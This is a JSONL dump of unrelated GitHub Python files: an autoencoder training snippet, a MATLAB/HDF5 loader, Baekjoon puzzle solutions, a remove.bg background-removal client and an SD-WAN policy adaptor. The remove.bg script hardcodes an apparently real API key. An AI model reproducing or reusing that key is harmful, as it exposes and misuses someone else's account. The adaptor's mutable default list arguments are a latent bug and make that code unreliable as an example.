shift = neighbor - i\n tmp[shift:m, i * n: (i + 1) * n] = x[:m - shift]\n for j in range(shift):\n tmp[j, i * n: (i + 1) * n] = x[0, :]\n else:\n shift = i - neighbor\n tmp[:m-shift, i * n: (i+1) * n] = x[shift:m]\n for j in range(shift):\n tmp[m-(j + 1), i * n: (i + 1) * n] = x[m-1, :]\n return tmp\n\ndef Normalize_data(x, mu, std):\n mean_noisy_10 = np.tile(mu, [8])\n std_noisy_10 = np.tile(std, [8])\n tmp = (x-mean_noisy_10)/std_noisy_10\n return np.array(tmp, dtype='float32')\n\ndef Normalize_label(x, mu, std):\n tmp = (x-mu)/std\n return np.array(tmp, dtype='float32')\n\ndef gen_context(x, neighbor, gmu, gstd):\n m = x.shape[0]\n u = make_window_buffer(x, neighbor)\n\n nat = np.zeros([m, 257])\n for k in range(0,7):\n nat += u[:, k*257:(k+1)*257]\n u = np.c_[u, nat/7]\n u = Normalize_data(u, gmu, gstd)\n return u\n# u: np.zeros([m, 257*8])\n\nclass Autoencoder:\n\n def __init__(self, vis_dim, hid_dim, W, function=lambda x: x):\n self.W = W\n self.a = tf.Variable(np.zeros(vis_dim).astype('float32'), name='a')\n self.b = tf.Variable(np.zeros(hid_dim).astype('float32'), name='b')\n self.function = function\n self.params = [self.W, self.a, self.b]\n\n def encode(self, x):\n u = tf.matmul(x, self.W) + self.b\n return self.function(u)\n\n def decode(self, x):\n u = tf.matmul(x, tf.transpose(self.W)) + self.a\n return self.function(u)\n\n def f_prop(self, x):\n y = self.encode(x)\n return self.decode(y)\n\n def reconst_error(self, x, noise):\n tilde_x = x * noise\n reconst_x = self.f_prop(tilde_x)\n error = tf.reduce_mean(tf.reduce_sum((x - reconst_x)**2, 1))\n return error, reconst_x\n\n\n\n\n","repo_name":"xia-lixun/dnn","sub_path":"src/python/train-crossentropy-matlab.py","file_name":"train-crossentropy-matlab.py","file_ext":"py","file_size_in_byte":8468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"35225274312","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: pho\n\"\"\"\nimport sys\nimport numpy as np\nimport pandas as pd\nfrom scipy.stats import kde\nimport h5py\nimport hdf5storage # conda install hdf5storage\nfrom pathlib import Path\n\n# Include using: from Pho_Import_Matlab_Data import import_mat_file, load_mat_file, print_variables\n\nfrom Pho_Import_Matlab_Data.plot_matlab_fig_file import plot_matlab_fig_file\n\n# See https://docs.h5py.org/en/stable/quick.html#quick for more info\n## In short, An HDF5 file is a container for two kinds of objects: datasets, which are array-like collections of data, and groups, which are folder-like containers that hold datasets and other groups. The most fundamental thing to remember when using h5py is:\n#### Groups work like dictionaries, and datasets work like NumPy arrays\n\nenable_print_type_values = True\n\ndef printname(name):\n print(name)\n\ndef print_attrs(name, obj):\n # Create indent\n shift = name.count('/') * ' '\n item_name = name.split(\"/\")[-1] # Get only the last suffix of the path (the variable name)\n if name.startswith(\"#refs#\"):\n # Exclude top level '#refs#' Group\n # print('Skipping #refs# group and its children...')\n # return -1 # Apparently returning a non-None value stops enumeration\n pass\n else:\n if isinstance(obj, h5py.Dataset):\n # obj node is a dataset\n print(': ' + shift + item_name)\n else:\n # obj node is a group\n print(': ' + shift + item_name)\n if enable_print_type_values:\n try:\n for key, val in obj.attrs.items():\n print(shift + ' ' + f\"{key}: {val}\")\n except:\n pass\n\n\n## Import Function Definitions:\n\ndef import_mat_file(mat_file_path):\n print('opening .mat file at {}'.format(mat_file_path))\n f = h5py.File(mat_file_path,'r')\n return f\n # print(f.keys())\n # data_position = f.get(active_variables)\n\n \ndef build_tree_entries(mat_file):\n data = [\n {'level': 0, 'dbID': 77, 'parent_ID': 6, 'short_name': '{}'.format(mat_file), 'long_name': '', 'order': 1, 'pos': 0} ,\n ]\n # f.keys()\n return data\n\n\ndef print_variables(h5pyFile, recurrsively=False):\n # Get the list of keys for the file\n # h5pyFile.keys()\n # h5pyFile.visit(printname)\n h5pyFile.visititems(print_attrs)\n\ndef load_mat_file(mat_file_path):\n out = hdf5storage.loadmat(mat_file_path) # Load all variables by default\n return out\n\n#end\n","repo_name":"CommanderPho/PhoPyMatlabConverter","sub_path":"Pho_Import_Matlab_Data/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"27967151286","text":"import sys\n\ninputing = lambda : sys.stdin.readline().rstrip()\nwow = lambda : map(int,inputing().split())\none = lambda : int(inputing())\n\n#https://www.acmicpc.net/problem/21735\n# l,k = wow()\n# n_list = [1]+list(wow())\n# cnt = 0\n# visited = [False]*(l+1)\n# def go(index,count,total,visited,record):\n# global k\n# global cnt\n# global l\n# # print(\"start!!\",index)\n# # print(\"record\",record,count)\n# # print(\"start\",index,count,total)\n# if count == k+1:\n# # print(\"wow!!\",index,total,count)\n# # print(visited)\n# if cnt < total:\n# cnt = total\n# return\n# if index <=l:\n# if visited[index] == False:\n# visited[index]=True\n# total+=n_list[index]\n# record.append(total)\n# count+=1\n# go(index+1,count,total,visited,record)\n# go(index+2,count,total//2,visited,record)\n# record.pop()\n# count-=1\n# total-=n_list[index]\n# visited[index]=False\n# else:\n# if cnt < total:\n# cnt = total\n# return\n# go(0,0,0,visited,[])\n# print(cnt)\n\n#https://www.acmicpc.net/problem/26169\n# n_list = [list(wow()) for _ in range(5)]\n# r,l = wow()\n# visited = [[False]*5 for _ in range(5)]\n# for y in range(5):\n# for x in range(5):\n# if n_list[y][x]==-1:\n# visited[y][x]=True\n# check = \"no\"\n# def go(y,x,count,total,visited):\n# global check\n# # print(\"Start\",y,x,count,total)\n# if count == 4:\n# if total >= 2:\n# check = \"yes\"\n# return\n# if total >=2:\n# check = \"yes\"\n# return\n# if 0<=y<=4 and 0<=x<=4:\n# if visited[y][x] == False:\n# visited[y][x]=True\n# if n_list[y][x] == 1:\n# total+=1\n# count+=1\n# go(y+1,x,count,total,visited) \n# go(y-1,x,count,total,visited) \n# go(y,x+1,count,total,visited) \n# go(y,x-1,count,total,visited) \n# count-=1\n# visited[y][x]=False\n# if n_list[y][x]==1:\n# total-=1\n# go(r,l,0,0,visited)\n# print(0 if check==\"no\" else 1)\n\n#https://www.acmicpc.net/problem/25328\nfrom itertools import permutations\na = list(inputing())\nb = list(inputing())\nc = list(inputing())\nk = one()\na = set(permutations(a,r=k))\nb = set(permutations(b,r=k))\nc = set(permutations(c,r=k))\nx,y,z = set(a&b),set(b&c),set(a&c)\nr = set(list(map(\"\".join,(map(sorted,list(x | y|z))))))\nif r:\n r = sorted(list(r))\n print(*r,sep=\"\\n\")\nelse:\n print(-1)\n\n\n\n\n\n\n\n\n","repo_name":"WinterWhiteSnow/Python-Baekjoon","sub_path":"2023/2월/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"33941340008","text":"# Requires \"requests\" to be installed (see python-requests.org)\nimport requests\npath = input(\"Enter file path\")\nresponse = requests.post(\n 'https://api.remove.bg/v1.0/removebg',\n files={'image_file': open(path, 'rb')},\n data={'size': 'auto'},\n headers={'X-Api-Key': 'BeoTpZimF517Xc2vFsAN1HLY'},\n)\nif response.status_code == requests.codes.ok:\n with open('no-bg.png', 'wb') as out:\n out.write(response.content)\nelse:\n print(\"Error:\", response.status_code, response.text)\n","repo_name":"abhinavsatheesh/Programming","sub_path":"Python/PythonPrograms/RemoveImageBg.py","file_name":"RemoveImageBg.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"21076248226","text":"import os\nimport logging\nimport pprint\nlogging.basicConfig(filename='adaptor.log', level=logging.DEBUG, \\\n datefmt='%a, %d %b %Y %H:%M:%S')\nlogger = logging.getLogger(__name__)\n \n\n\nimport metadata_adaptor.server_errors as err\nimport metadata_adaptor.template_generator as templates\nimport metadata_adaptor.vmanage_functions as vmg\n\nclass api_endpoint:\n\n def __init__(self):\n\n \n #Load config via env vars\n SDWAN_IP = os.environ.get(\"SDWAN_IP\")\n SDWAN_USERNAME = os.environ.get(\"SDWAN_USERNAME\")\n SDWAN_PASSWORD = os.environ.get(\"SDWAN_PASSWORD\")\n MERGE_POLICY = os.environ.get(\"MERGE_POLICY\")\n\n # SDWAN Controller endpoint\n self.api_endpoint = None\n\n # Internal vars \n self.srv_endpoints = {}\n self.app_route_traffic_profiles = {}\n self.data_traffic_profiles = {}\n self.metadata_keys = []\n\n # SDWAN Controller credentials\n self.credentials = {}\n self.credentials['sdwanControllerIpAddress'] = None\n self.credentials['user'] = None\n self.credentials['password'] = None\n self.credentials['sdwanMergedPolicyName'] = None\n\n\n\n # SDWAN controller login if env vars \n if (SDWAN_IP is not None) and (SDWAN_USERNAME is not None) \\\n and (SDWAN_PASSWORD is not None) and (MERGE_POLICY is not None):\n self.credentials['sdwanControllerIpAddress'] = SDWAN_IP\n self.credentials['user'] = SDWAN_USERNAME\n self.credentials['password'] = SDWAN_PASSWORD\n self.credentials['sdwanMergedPolicyName'] = MERGE_POLICY\n self.post_credentials(self.credentials)\n \n logger.info('Connecting to server %s', SDWAN_IP)\n \n\n def check_config(self):\n\n if self.credentials['sdwanControllerIpAddress'] is None or \\\n self.credentials['user'] is None or \\\n self.credentials['password'] is None:\n logger.error(\"Credentials of SDWAN controller are not defined.\")\n raise err.NoConfigData('Controller credentials user/password or IP')\n \n def test_connection(self):\n if self.api_endpoint.test_disconnect():\n logger.info(\"Connection lost to the SDWAN controller, re-authenticating.\")\n self.post_credentials(self.credentials)\n \n\n \n\n### SDWAN CONTROLLER CREDENTIALS\n\n def get_credentials(self):\n return self.credentials\n\n def post_credentials(self, cred):\n try:\n self.api_endpoint = vmg.rest_api_lib(cred['sdwanControllerIpAddress'], \\\n cred['user'], cred['password'])\n except Exception as e:\n raise e\n self.credentials = cred\n \n\n def delete_credentials(self):\n self.credentials['sdwanControllerIpAddress'] = None\n self.credentials['user'] = None\n self.credentials['password'] = None\n self.credentials['sdwanMergedPolicyName'] = None\n\n\n### SERVICE ENDPOINTS MANAGEMENT\n \n def get_service_endpoints_by_profile(self, profile):\n \n endpoints =[]\n \n for key, data in self.srv_endpoints.items():\n if data['trafficProfileName'] == profile:\n endpoints.append(key)\n \n return endpoints\n \n def delete_service_endpoint_by_profile(self, profile):\n \n to_delete = []\n \n for key, data in self.srv_endpoints.items():\n if data['trafficProfileName'] == profile:\n to_delete.append(key)\n \n for key in to_delete:\n del self.srv_endpoints[key] \n \n\n def get_service_endpoints(self):\n\n temp = []\n for key, profile in self.srv_endpoints.items():\n temp_key = key.split('_')\n temp.append({\n \"ipAddress\": temp_key[0],\n \"portNumber\": temp_key[1],\n \"trafficProfileName\": profile\n })\n return temp\n\n def post_service_endpoint(self, ipAddress, portNumber, profileName):\n\n key = ipAddress + '_' + portNumber\n error = {}\n \n if key in self.srv_endpoints.keys():\n msg = \"Ignoring request: the endpoint\" + key + \" is already defined\"\n logger.warning( err.ElementAlreadyDefined(\"post_service_endpoint\", msg))\n error['status'] = 400\n error['title'] = 'ENDPOINT ALREADY DEFINED'\n error['description'] = 'The endpoint IP: ' + ipAddress + ' and port ' + portNumber + ' is already defined. Ignoring this event.'\n return True, error\n \n defined, profile_type = self.is_traffic_profile_defined(profileName)\n if not defined:\n logger.warning(err.CannotFindElement('post_service_endpoint', \\\n 'Traffic profile ' + profileName + ' is not defined, ignoring request.'))\n error['status'] = 400\n error['title'] = 'CANNOT FIND TRAFFIC PROFILE'\n error['description'] = 'The traffic profile ' + profileName + ' is not defined. Ignoring this event.'\n return True, error\n \n \n try:\n\n if profile_type == 'AppRoute':\n \n policy_name = self.app_route_traffic_profiles[profileName]['policyName']\n defined, policy_id = self.is_policy_defined(policy_name, profile_type) \n if not defined:\n raise err.CannotFindElement('post_service_endpoint', policy_name)\n \n policy = self.api_endpoint.get_approute_policy_by_id(policy_id)\n payload = templates.add_approute_endpoint(policy, ipAddress, portNumber)\n response = self.api_endpoint.put_approute_policy(policy_id, payload, 'post_service_endpoint')\n self.srv_endpoints[key] = {\n 'trafficProfileName': profileName,\n 'policyId' : policy_id }\n # Trigger update for centralized policies that are active\n # The masterTemplatesAffected array is empty if the policy is NOT active\n if len(response[\"masterTemplatesAffected\"]) != 0:\n self.api_endpoint.update_active_policy(response[\"masterTemplatesAffected\"], 'post_service_endpoint')\n\n\n elif profile_type == 'Data':\n \n policy_name = self.data_traffic_profiles[profileName]['policyName']\n defined, policy_id = self.is_policy_defined(policy_name, profile_type) \n if not defined: \n raise err.CannotFindElement('post_service_endpoint', policy_name) \n \n policy = self.api_endpoint.get_data_policy_by_id(policy_id)\n payload = templates.add_data_endpoint(policy, ipAddress, portNumber)\n response = self.api_endpoint.put_data_policy(policy_id, payload, 'post_service_endpoint')\n self.srv_endpoints[key] = {\n 'trafficProfileName': profileName,\n 'policyId' : policy_id }\n # Trigger update for centralized policies that are active\n # The masterTemplatesAffected array is empty if the policy is NOT active\n if len(response[\"masterTemplatesAffected\"]) != 0:\n self.api_endpoint.update_active_policy(response[\"masterTemplatesAffected\"], 'post_service_endpoint')\n\n \n except err.CannotFindElement as e:\n logger.warning('Ignoring request: Cannot find a policy called %s', e.elem)\n \n except Exception as e:\n logger.error('An error ocurred while communicating with the SDWAN controller.')\n logger.error('Details: %s', e)\n\n return False, error\n\n def delete_service_endpoint(self, ipAddress, portNumber):\n\n key = ipAddress + '_' + portNumber\n error = {}\n \n if key not in self.srv_endpoints.keys():\n logger.warning(err.CannotFindElement(\"delete_service_endpoint\", \"This endpoint is not defined, ignoring request.\"))\n error['status'] = 400\n error['title'] = 'ENDPOINT NOT FOUND'\n error['description'] = 'Cannot process DELETE event: resource IP ' + ipAddress + ' and port ' + portNumber + ' does not exist. Ignoring this event.'\n return True, error\n \n traffic_profile = self.srv_endpoints[key]['trafficProfileName']\n policy_id = self.srv_endpoints[key]['policyId']\n\n try:\n \n if traffic_profile in self.app_route_traffic_profiles.keys():\n policy = self.api_endpoint.get_approute_policy_by_id(policy_id)\n payload = templates.remove_endpoint(policy, ipAddress, portNumber)\n response = self.api_endpoint.put_approute_policy(policy_id, payload, 'delete_service_endpoint')\n del self.srv_endpoints[key]\n if len(response[\"masterTemplatesAffected\"]) != 0:\n self.api_endpoint.update_active_policy(response[\"masterTemplatesAffected\"], 'delete_service_endpoint')\n\n elif traffic_profile in self.data_traffic_profiles.keys(): \n policy = self.api_endpoint.get_data_policy_by_id(policy_id)\n payload = templates.remove_endpoint(policy, ipAddress, portNumber)\n response = self.api_endpoint.put_data_policy(policy_id, payload, 'delete_service_endpoint')\n del self.srv_endpoints[key]\n if len(response[\"masterTemplatesAffected\"]) != 0:\n self.api_endpoint.update_active_policy(response[\"masterTemplatesAffected\"], 'delete_service_endpoint')\n\n else:\n\n logger.warning(err.CannotFindElement('delete_service_endpoint', \\\n 'Traffic profile ' + traffic_profile + ' is not defined, ignoring request.'))\n\n except Exception as e:\n logger.error('An error ocurred while communicating with the SDWAN controller.')\n logger.error('Exception name: %s', repr(e))\n logger.error('Details: %s', e)\n \n return False, error\n \n\n\n def put_service_endpoint(self, ipAddress, portNumber, profileName):\n error_data = {}\n \n #Check if the profile is defined \n profile_defined, profile_type = self.is_traffic_profile_defined(profileName)\n \n if not profile_defined: \n logger.warning(err.CannotFindElement(\"put_service_endpoint\", \\\n \"The traffic profile \" + profileName + \" is not defined, ignoring this request\"))\n error_data['status'] = 400\n error_data['title'] = 'CANNOT FIND TRAFFIC PROFILE'\n error_data['description'] = 'The traffic profile ' + profileName + ' is not defined. Ignoring this event.'\n return True, error_data\n \n #Check if the policy is defined\n if profile_type == 'AppRoute':\n policyName = self.app_route_traffic_profiles[profileName]['policyName']\n\n else:\n policyName = self.data_traffic_profiles[profileName]['policyName']\n\n policy_defined, _ = self.is_policy_defined(policyName, profile_type)\n \n if not policy_defined:\n logger.warning(err.CannotFindElement(\"put_service_endpoint\", \\\n 'Ignoring request: Cannot find a policy called '+ policyName ))\n return False, error_data\n \n # Do the actual work\n error, error_data = self.delete_service_endpoint(ipAddress, portNumber)\n if error:\n return error, error_data\n else:\n error, error_data = self.post_service_endpoint(ipAddress, portNumber, profileName)\n return error, error_data\n \n \n\n\n def create_data_policy_with_all_endpoints(self, previous_cnwan_remove = []):\n \n # Collect all endpoint + tunnel info for each profile\n cnwan_seqs = []\n \n \n for name, data in self.data_traffic_profiles.items():\n \n defined, policy_id = self.is_policy_defined(data['policyName'], 'Data')\n if defined: \n\n previous_cnwan_remove.append(data['policyName']) \n policy = self.api_endpoint.get_data_policy_by_id(policy_id)\n if len(policy['sequences']) > 1:\n temp_seqs = templates.change_seq_name(policy, data['policyName'])\n for seq in temp_seqs:\n cnwan_seqs.append(seq)\n else:\n logger.warning('In create_data_policy_with_all_endpoints, ignoring metadata value %s because \\\n policy %s does not exist in the SD-WAN controller.', name, data['policyName'])\n \n # Rertrieve and update merge policy\n policy_id = self.api_endpoint.get_data_policy_id_by_name(self.credentials['sdwanMergedPolicyName'])\n policy = self.api_endpoint.get_data_policy_by_id(policy_id)\n policy['sequences'] = templates.add_cnwan_sequences_to_merge_policy(policy['sequences'], cnwan_seqs, previous_cnwan_remove)\n logger.debug(\"New merge policy is %s\", pprint.pformat(policy['sequences']))\n response = self.api_endpoint.put_data_policy(policy_id, policy, 'create_data_policy_with_all_endpoints')\n \n # Trigger update for centralized policies that are active\n # The masterTemplatesAffected array is empty if the policy is NOT active\n if len(response[\"masterTemplatesAffected\"]) != 0:\n self.api_endpoint.update_active_policy(response[\"masterTemplatesAffected\"], 'create_data_policy_with_all_endpoints')\n \n def create_approute_policy_with_all_endpoints(self, previous_cnwan_remove = []):\n # Collect all endpoint + sla info for each profile\n cnwan_seqs = []\n \n for name, data in self.app_route_traffic_profiles.items():\n \n defined, policy_id = self.is_policy_defined(data['policyName'], 'AppRoute')\n if defined: \n \n previous_cnwan_remove.append(data['policyName'])\n policy = self.api_endpoint.get_approute_policy_by_id(policy_id)\n if len(policy['sequences']) > 1:\n temp_seqs = templates.change_seq_name(policy, data['policyName'])\n for seq in temp_seqs:\n cnwan_seqs.append(seq)\n else:\n logger.warning('In create_approute_policy_with_all_endpoints, ignoring metadata value %s because \\\n policy %s does not exist in the SD-WAN controller.', name, data['policyName'])\n \n # Rertrieve and update merge policy\n policy_id = self.api_endpoint.get_approute_policy_id_by_name(self.credentials['sdwanMergedPolicyName'])\n policy = self.api_endpoint.get_approute_policy_by_id(policy_id)\n policy['sequences'] = templates.add_cnwan_sequences_to_merge_policy(policy['sequences'], cnwan_seqs, previous_cnwan_remove) \n logger.debug(\"New merge policy for AppRoute is %s\", pprint.pformat(policy['sequences']))\n response = self.api_endpoint.put_approute_policy(policy_id, policy, 'create_approute_policy_with_all_endpoints')\n \n # Trigger update for centralized policies that are active\n # The masterTemplatesAffected array is empty if the policy is NOT active\n if len(response[\"masterTemplatesAffected\"]) != 0:\n self.api_endpoint.update_active_policy(response[\"masterTemplatesAffected\"], 'create_approute_policy_with_all_endpoints')\n \n def is_traffic_profile_defined(self, profileName):\n if profileName in self.app_route_traffic_profiles.keys():\n return True, 'AppRoute'\n elif profileName in self.data_traffic_profiles.keys():\n return True, 'Data'\n else:\n return False, None\n\n\n\n### POLICY MANAGEMENT\n \n def is_policy_defined(self, policyName, policyType):\n if policyType == 'AppRoute':\n policy_id = self.api_endpoint.get_approute_policy_id_by_name(policyName)\n \n elif policyType == 'Data':\n policy_id = self.api_endpoint.get_data_policy_id_by_name(policyName)\n \n else: \n return False, None\n \n \n if policy_id is None:\n return False, None\n else:\n return True, policy_id\n \n def is_policy_in_mappings(self, policyName, policyType):\n \n if policyType == 'AppRoute':\n for name, data in self.app_route_traffic_profiles.items(): \n if data['policyName'] == policyName:\n return True, name\n \n elif policyType == 'Data':\n for name, data in self.data_traffic_profiles.items():\n if data['policyName'] == policyName:\n return True, name\n \n return False, None\n \n \n def empty_approute_policy(self, policy_name, call_origin):\n policy_id = self.api_endpoint.get_approute_policy_id_by_name(policy_name)\n policy = self.api_endpoint.get_approute_policy_by_id(policy_id)\n payload = templates.create_empty_policy(policy)\n response = self.api_endpoint.put_approute_policy(policy_id, payload, call_origin)\n \n \n def add_endpoint_array_approute_policy(self, policy_id, endpoints, call_origin): \n policy = self.api_endpoint.get_approute_policy_by_id(policy_id)\n payload = templates.add_array_endpoints_to_approute_policy(endpoints, policy)\n response = self.api_endpoint.put_approute_policy(policy_id, payload, call_origin)\n \n \n \n def empty_data_policy(self, policy_name, call_origin):\n policy_id = self.api_endpoint.get_data_policy_id_by_name(policy_name)\n policy = self.api_endpoint.get_data_policy_by_id(policy_id)\n payload = templates.create_empty_policy(policy)\n response = self.api_endpoint.put_data_policy(policy_id, payload, call_origin)\n \n \n \n def add_endpoint_array_data_policy(self, policy_id, endpoints, call_origin):\n policy = self.api_endpoint.get_data_policy_by_id(policy_id)\n payload = templates.add_array_endpoints_to_data_policy(endpoints, policy)\n response = self.api_endpoint.put_data_policy(policy_id, payload, call_origin)\n\n \n \n\n### EXPOSED API FUNCITONS\n\n def get_mappings(self):\n\n temp = []\n for name, data in self.app_route_traffic_profiles.items():\n profile = {\n \"metadataKey\" : str(self.metadata_keys),\n \"metadataValue\": name,\n \"policyType\": \"AppRoute\",\n \"policyName\" : data['policyName']\n }\n temp.append(profile)\n\n for name, data in self.data_traffic_profiles.items():\n profile = {\n \"metadataKey\" : str(self.metadata_keys),\n \"metadataValue\": name,\n \"policyType\": \"Data\",\n \"policyName\" : data['policyName']\n\n }\n temp.append(profile)\n\n return temp\n\n def post_mapping(self, mapping):\n\n if mapping[\"metadataKey\"] not in self.metadata_keys:\n self.metadata_keys.append(mapping[\"metadataKey\"])\n logger.info('Detected new metadata key %s, adding to list.', mapping[\"metadataKey\"])\n \n \n name = mapping['metadataValue']\n profile_type = mapping['policyType']\n policy_defined_in_mapping, mapping_name = self.is_policy_in_mappings(mapping['policyName'], profile_type)\n\n if name in self.app_route_traffic_profiles.keys() or \\\n name in self.data_traffic_profiles.keys():\n \n msg = 'Ignoring request: the traffic profile ' + name + ' is already defined '\n logger.warning(err.ElementAlreadyDefined(\"post_traffic_profile\", msg))\n\n \n elif policy_defined_in_mapping:\n \n msg = 'Ignoring request: the policy ' + mapping['policyName'] + ' is already defined in the mapping ' + mapping_name\n logger.warning(msg)\n raise err.DuplicatePolicy(msg)\n \n else:\n \n if profile_type == 'AppRoute':\n self.app_route_traffic_profiles[name] = {\n 'policyName': mapping['policyName']\n }\n \n elif profile_type == 'Data':\n self.data_traffic_profiles[name] = {\n 'policyName' : mapping['policyName']\n }\n \n else:\n logger.warning('Ignoring request: unknow traffic policy type.')\n logger.warning(err.UnsupportedPolicyType(profile_type, ['AppRoute', 'Data']))\n\n\n \n\n def delete_mapping(self, profile_name):\n self.check_config()\n self.test_connection()\n \n if profile_name in self.app_route_traffic_profiles.keys(): \n \n #Delete endpoints from the policy\n policy_name = self.app_route_traffic_profiles[profile_name]['policyName']\n policy_defined, _ = self.is_policy_defined(policy_name, 'AppRoute')\n if policy_defined:\n\n self.empty_approute_policy(policy_name,'delete_mapping')\n \n # Regenerate merge policy\n self.create_approute_policy_with_all_endpoints()\n \n \n # Delete associated endpoints from internal variable\n self.delete_service_endpoint_by_profile(profile_name)\n \n # Delete traffic profile from internal variable\n del self.app_route_traffic_profiles[profile_name]\n \n\n elif profile_name in self.data_traffic_profiles.keys():\n \n #Delete endpoints from the policy\n policy_name = self.data_traffic_profiles[profile_name]['policyName']\n policy_defined, _ = self.is_policy_defined(policy_name, 'Data')\n if policy_defined:\n \n self.empty_data_policy(policy_name, 'delete_traffic_profile')\n #No active policies affected because these profiles are never active\n\n # Regenerate merge policy\n self.create_data_policy_with_all_endpoints()\n \n # Delete associated endpoints from internal variable\n self.delete_service_endpoint_by_profile(profile_name)\n\n \n # Delete traffic profile from internal variable\n del self.data_traffic_profiles[profile_name]\n \n else:\n logger.warning(err.CannotFindElement(\"delete_traffic_profile\",\\\n \"This traffic profile does not exist, ignoring request.\"))\n\n\n def put_mapping(self, profile_name, data):\n self.check_config()\n self.test_connection()\n \n \n profile_defined, profile_type = self.is_traffic_profile_defined(profile_name)\n # Verify new policiy is defined\n policy_defined, new_policy_id = self.is_policy_defined(data['policyName'], data['policyType'])\n #Verify policy NOT in use in other mappings\n policy_defined_in_mapping, mapping_name = self.is_policy_in_mappings(data['policyName'], data['policyType'])\n \n if not profile_defined:\n logger.warning(err.CannotFindElement(\"put_traffic_profile\", \\\n \"This traffic profile does not exist, ignoring request.\"))\n \n \n elif not policy_defined:\n logger.warning(err.CannotFindElement(\"put_traffic_profile\", \\\n \"The policy \" + str(data['policyName']) +\" does not exist in the sdwan controller, ignoring request.\"))\n \n \n elif policy_defined_in_mapping:\n \n msg = 'Ignoring request: the policy ' + data['policyName'] + ' is already defined in the mapping ' + mapping_name\n logger.warning(msg)\n raise err.DuplicatePolicy(msg)\n \n else:\n #List affected endpoints \n endpoints = self.get_service_endpoints_by_profile(profile_name)\n \n if profile_type == 'AppRoute':\n #Empty old policy\n policy_name = self.app_route_traffic_profiles[profile_name]['policyName']\n self.empty_approute_policy(policy_name, 'put_traffic_profile')\n \n if data['policyType'] == 'AppRoute':\n # AppRoute to AppRoute\n #Add enpoints to new policy\n self.add_endpoint_array_approute_policy(new_policy_id, endpoints, 'put_traffic_profile')\n \n #Update internal var\n old_policy = [ self.app_route_traffic_profiles[profile_name]['policyName'] ]\n self.app_route_traffic_profiles[profile_name]['policyName'] = data['policyName']\n \n # Regenerate merge policy\n self.create_approute_policy_with_all_endpoints(old_policy)\n \n else:\n # AppRoute to Data\n #Add endpoints to new policy\n self.add_endpoint_array_data_policy(new_policy_id, endpoints, 'put_traffic_profile')\n \n\n \n #Change type of profile\n old_policy = [ self.app_route_traffic_profiles[profile_name]['policyName'] ]\n self.data_traffic_profiles[profile_name] = {\n 'policyName' : data['policyName']\n } \n del self.app_route_traffic_profiles[profile_name]\n\n # Regenerate merge policies\n self.create_data_policy_with_all_endpoints()\n self.create_approute_policy_with_all_endpoints(old_policy)\n \n elif profile_type == 'Data':\n #Empty old policy\n policy_name = self.data_traffic_profiles[profile_name]['policyName']\n self.empty_data_policy(policy_name, 'put_traffic_profile')\n \n if data['policyType'] == 'Data':\n # Data to Data \n \n #Add endpoints to new policy\n self.add_endpoint_array_data_policy(new_policy_id, endpoints, 'put_traffic_profile')\n \n # Update internal var\n old_policy = [ self.data_traffic_profiles[profile_name]['policyName'] ]\n self.data_traffic_profiles[profile_name]['policyName'] = data['policyName']\n \n # Regenerate merge policy\n self.create_data_policy_with_all_endpoints(old_policy)\n\n \n else:\n # Data to AppRoute\n \n #Add endpoints to new policy\n self.add_endpoint_array_approute_policy(new_policy_id, endpoints, 'put_traffic_profile')\n \n #Change type of profile \n old_policy = [ self.data_traffic_profiles[profile_name]['policyName'] ]\n self.app_route_traffic_profiles[profile_name] = {\n 'policyName': data['policyName']\n }\n del self.data_traffic_profiles[profile_name]\n \n # Regenerate merge policies\n self.create_data_policy_with_all_endpoints(old_policy)\n self.create_approute_policy_with_all_endpoints()\n\n #Update internal endpoint variable\n for ep in endpoints:\n self.srv_endpoints[ep]['policyId'] = new_policy_id\n\n\n\n def extract_profile(self, service):\n if 'metadata' not in service:\n return None\n \n for elem in service['metadata']:\n if elem['key'] in self.metadata_keys:\n return elem['value']\n return None\n \n def get_md_key_not_defined(self, service):\n if 'metadata' not in service:\n return ['MISSING METADATA ARRAY']\n \n not_def = []\n for elem in service['metadata']:\n if elem['key'] not in self.metadata_keys:\n not_def.append(elem['key'])\n \n return not_def\n\n def events(self, updates):\n self.check_config()\n self.test_connection()\n error_events =[]\n \n for elem in updates:\n ipAddress = elem['service']['address']\n portNumber = str(elem['service']['port'])\n profileName = self.extract_profile(elem['service'])\n logger.debug('Processing %s event on endpoint %s:%s', elem['event'], ipAddress, portNumber)\n \n \n \n if elem['event'] == 'delete':\n error, error_data = self.delete_service_endpoint(ipAddress, portNumber)\n if error:\n error_data['resource'] = elem['service']['name']\n error_events.append(error_data)\n \n elif profileName is None:\n #Unknown metadata key \n error = {}\n error['status'] = 400\n error['resource'] = elem['service']['name']\n error['title'] = 'MISSING METADATA KEY'\n error['description'] = 'The metadata key ' + str(self.get_md_key_not_defined(elem['service'])) + ' is \\\n not currently defined in the adaptor. Ignoring this event.'\n error_events.append(error)\n \n elif elem['event'] == 'create':\n error, error_data = self.post_service_endpoint(ipAddress, portNumber, profileName)\n if error:\n error_data['resource'] = elem['service']['name']\n error_events.append(error_data)\n \n elif elem['event'] == 'update':\n error, error_data = self.put_service_endpoint(ipAddress, portNumber, profileName)\n if error:\n error_data['resource'] = elem['service']['name']\n error_events.append(error_data)\n\n else:\n #Unknown operation\n error = {}\n error['status'] = 405\n error['resource'] = elem['service']['name']\n error['title'] = 'Unsupoorted eventy type'\n error['description'] = 'The event ' + elem['event'] + ' is not currently \\\n supported. Supported events: create, update and delete.'\n error_events.append(error)\n \n \n self.create_data_policy_with_all_endpoints()\n self.create_approute_policy_with_all_endpoints() \n \n if len(error_events) != 0:\n logger.warning('The following elements were ingored: %s', error_events)\n raise err.PartialEventsError(error_events)\n\n","repo_name":"CloudNativeSDWAN/cnwan-adaptor","sub_path":"adaptor_library/metadata_adaptor/core_lib.py","file_name":"core_lib.py","file_ext":"py","file_size_in_byte":31295,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"}
